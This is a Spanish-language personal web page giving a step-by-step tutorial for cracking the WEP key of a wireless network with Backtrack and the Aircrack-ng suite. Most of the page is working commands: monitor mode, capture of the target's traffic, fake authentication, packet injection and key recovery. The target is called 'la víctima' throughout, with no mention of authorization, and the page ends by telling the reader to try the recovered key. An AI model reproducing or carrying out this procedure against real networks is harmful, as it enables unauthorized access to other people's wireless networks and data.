Obtener Claves WEP con Backtrack
TuWeb
Álbum de Fotos
Mis aficiones
Obtener Claves WEP con Backtrack
Mis enlaces
 
Obtener Claves WEP con Backtrack

En este documento usaremos una distribucion GNU/linux pensada y diseñada para la auditoría de seguridad y relacionada con la seguridad informática en general, llamada Backtrack.

Backtrack le ofrece al usuario una extensa colección de herramientas, Entre las herramientas ofrecidas se encuentran:

-Aircrack-ng.
-Kismet.
-Ettercap.
-Wireshark.
-Nmap.

Y una larga lista de otras herramientas, que se agrupan en 11 familias:

-Recopilación de Información.
-Mapeo de Puertos.
-Identificación de Vulnerabilidades.
-Análisis de aplicaciones Web.
-Análisis de redes de radio (WiFi, Bluetooth, RFID).
-Penetración (Exploits y Kit de herramientas de ingeniería social).
-Escalada de privilegios.
-Mantenimiento de Acceso.
-Forenses.
-Ingeniería inversa.
-Voz sobre IP.

De todas estas herramientas usaremos la suite Aircrack-ng.

Aircrack-ng es una suite de software de seguridad inalámbrica. Consiste en un analizador de paquetes de redes, un crackeador de redes WEP y WPA/WPA2-PSK y otro conjunto de herramientas de auditoría inalámbrica.

Esta suite está diseñada para trabajar con tarjetas inalámbricas con circuitos integrados Atheros y con algunas con circuitos Railink sin necesidad de configurarlas. También se ha logrado usar la suite en otros circuitos, con configuraciones especiales en Linux.

Pueden descargar el Backtrack desde su pagina:
http://www.backtrack-linux.org/
............................................


Ahora si lo bueno

Una ves abierto el Bactrack abrimos una terminal y tecleamos el siguiente comando:
"iwconfig" y presionas enter para visualizar el nombre de la interfaz inalámbrica de tu computadora.

Escribe "airmon-ng start wlan0" en la terminal y presiona "Enter" para continuar. Reemplaza "wlan0" por el nombre de tu interfaz inalámbrica del paso anterior.

Explico que es el arimon-ng.

'Airmon-ng'
Descripción:
Este script puede usarse para activar el modo monitor de las tarjetas wireless. Tambien puede usarse para parar las interfaces y salir del modo monitor.

Uso
Usa: airmon-ng <start|stop> <interface> [canal]
Donde:
- <start|stop> indica si deseas iniciar o parar el modo monitor.(obligatorio).
- <interface> el nombre de la interface. (obligatorio).
- [channel] opcionalmente se puede especificar un número de canal.

Bueno seguimos....

Escribe "airodump-ng -w dump mon0" en la terminal y presiona "Enter" para mostrar una pantalla que contiene las redes inalámbricas disponibles en tu computadora.

Luego ponemos en la terminal
"airodump-ng -w red --bssid ff:ff:ff:ff:ff:ff -c 11 mon0"

Con esto se empiesa a hacer la captura de datos, la data tiene que llegar a unos 30 mil paquetes para que obtenga la contraseña.

Donde:
-w = nombre del archivo .cap (donde se guarda la captura).
--bssid = dirección mac de la red víctima.
-c = canal de la red víctima.
ff:ff:ff:ff:ff:ff la sustituyes por la direccion mac de la victima.

Ahora abrimos otra terminal y ejecutamos el siguiente comando:
"aireplay-ng -1 0 -a ff:ff:ff:ff:ff:ff mon0"
ff:ff:ff:ff:ff:ff la sustituyes por la direccion mac de la victima.
Con esto nos atentificamos con una direccion falsa, para pasar al siguiente paso el cual es hacer inyeccion de datos de paquetes.

Escribe:
"aireplay-ng -2 -p 0841 -c ff:ff:ff:ff:ff:ff -b aa:aa:aa:aa:aa:aa -h bb:bb:bb:bb:bb:bb mon0"
Esto es para acelerar el proceso de inyeccion de paquete de datos.
* ff:ff:ff:ff:ff:ff dejalo asi no lo cambies
* aa:aa:aa:aa:aa:aa cambiala por la direccion mac de la victima
* bb:bb:bb:bb:bb:bb cambiala por la direccion mac que te arrojo el comando anterior.

Luego les saldra un mensaje y le dan que si tecleando: "y", ya hora si empiesa a inyectar paquetes de datos.
Bueno ahora solo tenemos que esperar que el data llegue a 30 mil data.

Pulsa ctrl+c para detener la inyeccion en la segunda terminal que abrimos y la cerramos.

Luego en la primer terminal que teniamos abiera escribimos lo siguiente:
"dir" muestra el nombre del archivo donde se guarda la captura.

Teclea:
"aircrack-ng dump-01.cap"
cambia 'dump-01' por el nombre del archivo que te salio al teclear "dir".

Saldra un mensaje "Key Found! [01:01:01:01:01]". Los datos entre corchetes es la clave de la red inalámbrica.

Listo, esto es todo, prueba la clave.
esto es solo para las WEP.